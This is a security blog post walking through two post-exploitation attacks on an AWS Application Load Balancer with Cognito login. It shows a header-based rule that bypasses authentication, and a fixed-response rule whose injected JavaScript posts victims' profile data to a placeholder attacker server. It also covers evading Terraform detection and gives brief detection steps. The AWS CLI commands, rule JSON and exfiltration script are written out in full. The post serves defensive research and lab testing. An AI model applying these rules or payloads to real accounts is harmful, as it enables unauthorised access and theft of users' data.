Rigging the Rules: Manipulating AWS ALB to Mine Sensitive Data

Adan
Oct 24, 2023


In our ongoing exploration of post-exploitation attack vectors within AWS services, we’ve previously examined potential attacks against CloudFront and AppSync. This article turns the spotlight on the Application Load Balancer (ALB). As described by AWS, “Application Load Balancer operates at the request level (layer 7), routing traffic to targets (EC2 instances, containers, IP addresses, and Lambda functions) based on the content of the request.” So, just like AppSync and CloudFront, ALB is, most of the time, the initial touchpoint for user traffic, making it an excellent target for attackers aiming to intercept sensitive data.

Before going into the details, a clarification, as in the previous articles: the scenarios I present here, like those from the other articles, are not entirely new or groundbreaking. My goal is to highlight alternative techniques attackers might use once they have access to an AWS account with limited permissions.

This time, instead of two different scenarios, we'll look at a single scenario with two potential attack vectors. The scenario is an ALB integrated with Cognito for user authentication. Authenticated requests are forwarded to an EC2 instance running a simple Python application. The app has an index page with “Secret information” accessible only to authenticated users and a ‘/me’ endpoint that returns the user’s data from Cognito. Here, we can see how the scenario works under normal conditions:

Figure 1. Normal use of the application

Let’s examine two potential attack scenarios:

Attack 1: Authentication Bypass

One technique an attacker might use to access the data served by the application is to introduce a new rule that bypasses authentication for requests containing a specific header. To do so, an attacker would:

1. Get the load balancer ARN using ‘describe-load-balancers’:

aws elbv2 describe-load-balancers

2. Get the load balancer listener ARN and the target group ARN (already configured in the default rule):

aws elbv2 describe-listeners --load-balancer-arn <Load-Balancer-ARN>

3. Create a rule on the listener with priority 1, a condition that matches a specific header, and an action that forwards to the same target group as the default rule:

aws elbv2 create-rule --listener-arn <Listener-ARN> --priority 1 --conditions file://conditions-pattern.json --actions Type=forward,TargetGroupArn=<Target-Group-ARN>

Where conditions-pattern.json is, for example:

[
  {
    "Field": "http-header",
    "HttpHeaderConfig": {
      "HttpHeaderName": "Bypass",
      "Values": [
        "true"
      ]
    }
  }
]

After this, a request without the Bypass header will be redirected to Cognito (to initiate the login flow):

Figure 2. Request without special headers

But a request with the header “Bypass: true” will go to the EC2 instance, allowing the attacker to read “Secret information”:

Figure 3. Request including the Bypass header
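These two behaviors can be reproduced from the attacker’s side with curl (the load balancer’s DNS name below is a placeholder):

# Without the header, the ALB answers with a redirect to the Cognito login page
curl -i https://<ALB-DNS>/

# With the header, the new rule forwards the request straight to the EC2 target
curl -i -H "Bypass: true" https://<ALB-DNS>/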

But if we go to /me, we won’t be able to get the user’s information, as we do not have a token:

Figure 4. Request with the Bypass header failing to get the user’s data

Attack 2: Data Exfiltration via Injected JavaScript

The second attack vector is a bit more sophisticated. Here, the attacker uses the ALB’s ability to send fixed responses to inject malicious JavaScript into the user’s browser, similar to what we did in the CloudFront scenario. The big difference in this scenario is that the ALB sets the session cookie with the HttpOnly flag. Because of this, the attacker won’t be able to steal the user’s cookie directly, but will still be able to inject JavaScript that exfiltrates the data. This tactic isn’t straightforward, because the attacker needs to maintain the application’s functionality and avoid alerting the user. For this attack to succeed, an attacker might use the following rules, each designed to trigger under certain circumstances:

Rule 1 checks for a ‘bypass’ cookie in the request. If this cookie exists, it means that the user’s session has already encountered the malicious script, so the request is forwarded to the original authentication process and eventually to the EC2 instance. This rule ensures that users can continue using the application normally after executing the malicious script.
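ALB rules have no dedicated cookie condition, so one way to implement this check (an assumption on my part, the repository may do it differently) is an http-header condition with a wildcard over the Cookie header, for example in a file such as rule1-conditions.json (the file name is illustrative):

[
  {
    "Field": "http-header",
    "HttpHeaderConfig": {
      "HttpHeaderName": "Cookie",
      "Values": [
        "*bypass=true*"
      ]
    }
  }
]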

Rule 2 looks for a custom ‘Bypass’ header in the request. When this header is present and set to ‘true,’ it indicates that the request comes from the malicious script attempting to retrieve data. The rule then allows these requests to pass through to the authentication process and the EC2 instance, enabling the script to collect user data without getting caught in a loop with the fixed-response rule.
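For Rule 2, the attacker can reuse the header condition from Attack 1 and copy the default rule’s action chain (authenticate-cognito followed by forward). A minimal sketch, where default-rule-actions.json is an illustrative file containing the actions copied from the describe-rules output:

# Inspect the default rule to copy its actions (authenticate-cognito + forward)
aws elbv2 describe-rules --listener-arn <Listener-ARN>

# Reuse conditions-pattern.json from Attack 1
aws elbv2 create-rule --listener-arn <Listener-ARN> --priority 2 --conditions file://conditions-pattern.json --actions file://default-rule-actions.json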

Rule 3 is the critical rule that triggers the malicious script. It’s activated when the request contains the ALB’s authentication cookie but lacks the ‘bypass’ cookie. This condition typically occurs immediately after a user authenticates. The rule responds with fixed content, including malicious JavaScript. This script, executed in the user’s browser, silently calls the ‘/me’ endpoint using the ‘Bypass’ header, collects user data, and sends it to the attacker’s external server. It then sets the ‘bypass’ cookie and redirects the user back to their intended URL, making the attack almost invisible to the user. Here is an example of the action with the malicious JS:

[
  {
    "Type": "fixed-response",
    "Order": 1,
    "FixedResponseConfig": {
      "MessageBody": "<html lang=\"en\"> <head> <script> async function getDataAndForward() { const response = await fetch('https://test.adanalvarez.click/me',{ headers: { 'bypass': 'true', }}); const data = await response.text(); document.cookie = \"bypass=true; path=/\"; const forwardResponse = await fetch('https://MALICIOUS_SERVER/receive', { method: 'POST', body: data }); window.location.href = window.location.pathname; } window.onload = getDataAndForward; </script> </head> <body> <h1>Loading...</h1> </body> </html>",
      "StatusCode": "202",
      "ContentType": "text/html"
    }
  }
]
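To wire Rule 3 together, a condition matching the ALB’s authentication cookie is needed. A sketch, assuming the default cookie name AWSELBAuthSessionCookie and that the action above is saved as rule3-action.json (both file names are illustrative):

[
  {
    "Field": "http-header",
    "HttpHeaderConfig": {
      "HttpHeaderName": "Cookie",
      "Values": [
        "*AWSELBAuthSessionCookie*"
      ]
    }
  }
]

aws elbv2 create-rule --listener-arn <Listener-ARN> --priority 3 --conditions file://rule3-condition.json --actions file://rule3-action.json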

After these, the default rule doesn’t need modification. It is the fallback if none of the above conditions are met, usually applying to new, unauthenticated users. It allows them to go through the standard authentication process, keeping the application’s legitimate front intact. In the end, the rules will look like this:

Figure 5. Example of configured rules for the attack

In the next GIF, the victim’s browser is on the left and the attacker's server is on the right. The victim accesses the web application and is redirected to the login screen (Cognito). After authentication, the victim is sent back to the application and the malicious script is executed (the loading page); after that, the user can navigate as usual. On the attacker’s side, we can see that, when the malicious script runs, the server receives the data from /me.

Figure 6. View of the victim’s browser and the attacker’s server

The Stealth Factor in Terraform

An interesting aspect of these attacks is their invisibility to Terraform due to how Terraform manages certain AWS resources. Terraform treats rules within the AWS Application Load Balancer (ALB) as separate entities, managed using the aws_lb_listener_rule resource. This design means that when attackers introduce new rules directly via the AWS interface or CLI, these rules appear as independent resources outside of Terraform’s management scope.

Consequently, even as teams use Terraform to provision and manage their infrastructure, these externally added rules go unnoticed. The infrastructure appears as expected from Terraform’s viewpoint, even though it’s silently compromised at the ALB level.
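One way to surface rules added out of band is to list what the listener actually has and compare it with what Terraform is tracking, for example (resource addresses will vary per project):

# All rules currently on the listener, including ones created outside Terraform
aws elbv2 describe-rules --listener-arn <Listener-ARN>

# Listener rules known to Terraform
terraform state list | grep aws_lb_listener_rule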

Figure 7. Terraform output after executing a plan

Conclusion

As we’ve seen once again, attackers don’t require a highly privileged account or direct access to the data to cause significant harm. Gaining access to a single AWS service, like the ALB in this example, opens the door to considerable data theft via post-exploitation. This example shows again how important early detection is to limiting an attack’s spread and severity. If we can catch the malicious rules, we can stop the attack and protect our users’ data.
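As a minimal detection sketch, assuming CloudTrail is enabled in the account, the relevant API calls can be queried from the CLI:

# Recent CreateRule calls against Elastic Load Balancing (ModifyRule and ModifyListener are worth checking too)
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateRule --max-results 20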

Optional: Testing in a Controlled Environment

For those interested in testing the above or any of the other examples, I’ve shared Terraform files in this GitHub repository.
